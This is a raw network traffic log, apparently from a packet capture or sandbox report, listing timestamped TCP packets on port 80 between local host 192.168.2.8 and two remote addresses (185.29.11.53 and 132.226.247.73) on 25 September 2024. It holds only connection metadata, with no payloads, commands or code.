Sep 25, 2024 16:01:27.330832005 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.330857992 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.330888987 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.331615925 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.331629038 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.331640005 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.331664085 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.331681013 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.331681013 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.331695080 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.331727982 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.331754923 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.332525015 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.332535982 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.332546949 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.332586050 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.332616091 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.332633972 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.332647085 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.332678080 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.332700968 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.333323002 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.333343983 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.333355904 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.333365917 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.333380938 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.333405018 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334034920 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334060907 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334075928 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334083080 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334095955 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334115028 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334572077 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334609985 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334625006 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334635973 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334666967 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334683895 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.334717035 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334728956 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.334811926 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.335304022 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.335345030 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.335376024 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.335418940 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.335637093 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.335690022 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.335805893 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.335860968 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.335875988 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.335922003 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.336179018 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336230040 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.336363077 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336374998 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336385965 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336410999 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.336425066 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.336435080 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336447954 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.336483002 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.336512089 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.337486029 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.337546110 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.337647915 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.337661982 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.337697983 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.337709904 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.337871075 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.337920904 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338011980 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338023901 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338068962 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338088036 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338336945 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338359118 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338371038 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338388920 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338418961 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338432074 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338444948 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.338460922 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338478088 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.338500977 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.339270115 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.339292049 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.339304924 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.339334011 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.339344025 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.339354992 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.339370012 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.339400053 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.339426994 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340198040 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340259075 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340264082 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340274096 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340317011 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340339899 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340353012 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340363979 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340372086 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340377092 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340390921 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340392113 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340434074 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340451956 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340452909 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340502024 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340687990 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340742111 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340764999 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340776920 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340821028 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340831995 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340905905 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340919018 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340929985 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340941906 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340955019 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340956926 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340967894 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340976000 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.340981007 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.340992928 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341011047 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341026068 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341031075 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341044903 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341047049 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341058969 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341070890 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341070890 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341113091 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341140985 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341672897 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341728926 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.341902018 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.341950893 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398613930 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398644924 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398658037 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398736954 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398758888 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398781061 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398799896 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398813009 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398818970 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398824930 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398837090 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398849010 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398855925 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398859978 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398873091 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398885965 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398885965 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398897886 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398906946 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398911953 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398922920 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.398926973 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398937941 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398951054 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.398952007 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.399024963 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404110909 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404138088 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404150963 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404172897 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404197931 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404198885 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404210091 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404223919 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404236078 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404247046 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404278040 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404284000 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404295921 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404308081 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404320002 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404321909 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404331923 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404341936 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404349089 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404378891 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404432058 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404445887 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404452085 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404457092 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404463053 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404468060 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404474974 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404479980 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404485941 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404489994 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404500961 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404509068 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404556036 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404584885 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.404593945 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.404620886 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415457010 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415473938 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415487051 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415498018 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415510893 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415523052 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415530920 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415534973 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415546894 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415551901 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415559053 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415571928 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415585041 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415585041 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415596962 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415604115 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415610075 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415621042 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415631056 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415633917 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415644884 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415657997 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415667057 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415671110 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415683985 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415687084 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415694952 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415702105 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415709972 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415720940 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415723085 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415733099 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415745020 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415756941 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415760040 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415767908 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415780067 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415791988 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415801048 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415803909 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415816069 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415822029 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415827990 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415836096 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415839911 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415852070 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415858030 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415864944 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415878057 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415889978 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415889978 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415901899 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415915012 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.415931940 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415951967 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.415977001 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416712999 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416738033 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416750908 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416760921 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416775942 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416780949 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416793108 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416795015 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416825056 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416831970 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.416831970 CEST | 80 | 49710 | 185.29.11.53 | 192.168.2.8 |
Sep 25, 2024 16:01:27.416898966 CEST | 49710 | 80 | 192.168.2.8 | 185.29.11.53 |
Sep 25, 2024 16:01:27.726623058 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:27.731508017 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:27.731575966 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:27.731781960 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
Sep 25, 2024 16:01:27.736515045 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:28.417197943 CEST | 80 | 49711 | 132.226.247.73 | 192.168.2.8 |
Sep 25, 2024 16:01:28.421348095 CEST | 49711 | 80 | 192.168.2.8 | 132.226.247.73 |
